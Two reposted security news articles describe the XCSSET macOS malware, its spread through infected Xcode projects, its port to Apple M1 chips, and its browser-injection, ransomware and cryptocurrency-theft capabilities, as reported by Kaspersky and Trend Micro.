Mac Malware 'XCSSET' Adapted for Devices With M1 Chips

[mood]

Mac Malware 'XCSSET' Adapted for Devices With M1 Chips

 

An increasing number of Mac malware developers have started creating variants that are specifically designed to run on devices powered by Apple’s M1 chip.

 

Apple unveiled its M1 system-on-chip in November 2020 and the first malware created specifically for systems with the arm64 CPU architecture used by the M1 was apparently created in December. This was a variant of Pirrit, a piece of adware that has been around for several years.

 

A few days after the existence of this Pirrit variant came to light, managed detection and response firm Red Canary reported identifying a mysterious piece of Mac malware that had infected tens of thousands of devices around the world. This malware, named Silver Sparrow, also had a variant specifically designed for M1 systems.

 

Kaspersky reported on Friday that it too has spotted a piece of malware with a variant compiled for devices with M1 chips, specifically a variant of the malware known as XCSSET.

 

XCSSET is a mysterious piece of malware first detailed by Trend Micro and Mac security company Intego in August 2020. It does not appear to have been linked to any known threat group or activity, but a majority of infections spotted at the time were in China and India.

 

The malware is designed to allow its operator to launch ransomware attacks (i.e. encrypt files and display a ransom note), and steal information from infected devices, including data associated with the Evernote, Skype, Notes, QQ, WeChat, and Telegram apps.

 

It can also launch universal cross-site scripting (UXSS) attacks in an effort to inject arbitrary JavaScript code into the websites visited by the victim. This allows it to modify sites, including replacing cryptocurrency addresses, and phish credentials and payment card information.

 

XCSSET spreads through code injected into projects for Xcode, Apple’s integrated development environment. The payload is executed when the project is built.

Kaspersky has seen an XCSSET sample compiled for the arm64 architecture. This sample was uploaded to the VirusTotal malware analysis service on February 24, which has led the company’s researchers to believe that the campaign is likely still ongoing.

 

Kaspersky noted that in many cases Mac malware is delivered in the Mach-O format, which includes the malicious code compiled for several architectures — depending on what type of device the malware lands on, the code corresponding to that architecture is executed.

“With the new M1 chip, Apple has certainly pushed its performance and energy saving limits on Mac computers, but malware developers kept an eye on those innovations and quickly adapted their executables to Apple Silicon by porting the code to the ARM64 architecture,” Kaspersky researchers wrote in a blog post.

 

They added, “We have observed various attempts to port executables not just among typical adware such as Pirrit or Bnodlero samples, but also among malicious packages, such as the Silver Sparrow threat and XCSSET downloadable malicious modules. This certainly will give a kickstart to other malware adversaries to begin adapting their code for running on Apple M1 chips.”

 

 

Source: Mac Malware 'XCSSET' Adapted for Devices With M1 Chips

[mood]

Malware Spreads Via Xcode Projects Now Targeting Apple's M1-based Macs

 

 

A Mac malware campaign targeting Xcode developers has been retooled to add support for Apple's new M1 chips and expand its features to steal confidential information from cryptocurrency apps.

 

XCSSET came into the spotlight in August 2020 after it was found to spread via modified Xcode IDE projects, which, upon the building, were configured to execute the payload. The malware repackages payload modules to imitate legitimate Mac apps, which are ultimately responsible for infecting local Xcode projects and injecting the main payload to execute when the compromised project builds.

 

XCSSET modules come with the capabilities to steal credentials, capture screenshots, inject malicious JavaScript into websites, plunder user data from different apps, and even encrypt files for a ransom.

 

Then in March 2021, Kaspersky researchers uncovered XCSSET samples compiled for the new Apple M1 chips, suggesting that the malware campaign was not only ongoing but also that adversaries are actively adapting their executables and porting them to run on new Apple Silicon Macs natively.

 

 

The latest research by Trend Micro shows that XCSSET continues to abuse the development version of the Safari browser to plant JavaScript backdoors onto websites via Universal Cross-site Scripting (UXSS) attacks.

"It hosts Safari update packages in the [command-and-control] server, then downloads and installs packages for the user's OS version," Trend Micro researchers said in an analysis published on Friday. "To adapt to the newly-released Big Sur, new packages for 'Safari 14' were added."

 

In addition to trojanizing Safari to exfiltrate data, the malware is also known for exploiting the remote debugging mode in other browsers such as Google Chrome, Brave, Microsoft Edge, Mozilla Firefox, Opera, Qihoo 360 Browser, and Yandex Browser to carry out UXSS attacks.

 

What's more, the malware now even attempts to steal account information from multiple websites, including cryptocurrency trading platforms Huobi, Binance, NNCall.net, Envato, and 163.com, with abilities to replace the address in a user's cryptocurrency wallet with those under the attacker's control.

 

XCSSET's mode of distribution via doctored Xcode projects poses a serious threat, as affected developers who unwittingly share their work on GitHub could pass on the malware to their users in the form of the compromised Xcode projects, leading to "a supply-chain-like attack for users who rely on these repositories as dependencies in their own projects."

 

 

Source: Malware Spreads Via Xcode Projects Now Targeting Apple's M1-based Macs